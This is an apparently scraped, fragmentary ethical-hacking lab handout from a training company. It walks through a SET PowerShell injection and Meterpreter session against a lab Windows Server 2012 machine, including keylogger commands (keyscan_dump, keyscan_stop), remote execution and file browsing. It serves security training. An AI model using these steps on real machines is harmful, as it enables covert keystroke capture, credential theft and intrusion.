Professional Documents
Culture Documents
06 - Powershell Attack - Tested
06 - Powershell Attack - Tested
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
As a responsible ethical hacker, security engineer or penetration tester you should be familiar with the tools to
perform a penetration testing
HANDS-ON LAB:
Lab Objectives:
Lab Duration:
▪ Time: 45 minutes
Lab Environment
▪ You need internet connection
Lab Tasks
Tools
Step-by-Steps Instructions
type yes
! open a new term and look for the powershell injection file
cp /root/.set/reports/powershell/ Desktop
1 I have copied the file already to windows server 2012 desktop, just run clean.bat
1
NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
Type sysinfo
Go to windows and type eventvwr check to see that the windows logs has thousands of event log which is about to
disappear
execute -f calc
! Dump the keystroke buffer and you will see all the keystroke from server 2012
keyscan_dump
! Stop keylogger
keyscan_stop
! go to Windows dir and you will see that you have gained access to windows servers drive c:
cd c:\windows
pwd
ls
2
NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Downloads>ps
Result of penetration testing: by now you should know how attacker send keylogger and gather the username
and password to be used for remote connection to gain root access
Question: As a Nexus Ethical Hacker what should you do to protect your company from Powershell Attack